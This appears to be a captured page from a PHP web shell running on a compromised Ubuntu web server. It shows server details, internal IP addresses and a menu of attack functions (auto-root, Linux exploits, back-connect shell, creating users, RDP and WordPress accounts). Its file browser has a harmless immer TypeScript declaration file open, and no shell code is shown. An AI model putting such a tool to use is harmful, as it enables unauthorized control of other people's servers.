Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
immer /
dist /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
current.d.ts
348
B
-rw-rw-r--
current.d.ts.map
187
B
-rw-rw-r--
finalize.d.ts
158
B
-rw-rw-r--
finalize.d.ts.map
220
B
-rw-rw-r--
immerClass.d.ts
2.36
KB
-rw-rw-r--
immerClass.d.ts.map
1.09
KB
-rw-rw-r--
proxy.d.ts
1.23
KB
-rw-rw-r--
proxy.d.ts.map
1.08
KB
-rw-rw-r--
scope.d.ts
746
B
-rw-rw-r--
scope.d.ts.map
676
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : proxy.d.ts
import { ImmerBaseState, ImmerState, Drafted, AnyObject, AnyArray, Objectish, ProxyType } from "../internal"; interface ProxyBaseState extends ImmerBaseState { assigned_: { [property: string]: boolean; }; parent_?: ImmerState; revoke_(): void; } export interface ProxyObjectState extends ProxyBaseState { type_: ProxyType.ProxyObject; base_: any; copy_: any; draft_: Drafted<AnyObject, ProxyObjectState>; } export interface ProxyArrayState extends ProxyBaseState { type_: ProxyType.ProxyArray; base_: AnyArray; copy_: AnyArray | null; draft_: Drafted<AnyArray, ProxyArrayState>; } declare type ProxyState = ProxyObjectState | ProxyArrayState; /** * Returns a new draft of the `base` object. * * The second argument is the parent draft-state (used internally). */ export declare function createProxyProxy<T extends Objectish>(base: T, parent?: ImmerState): Drafted<T, ProxyState>; /** * Object drafts */ export declare const objectTraps: ProxyHandler<ProxyState>; export declare function markChanged(state: ImmerState): void; export declare function prepareCopy(state: { base_: any; copy_: any; }): void; export {}; //# sourceMappingURL=proxy.d.ts.map
Close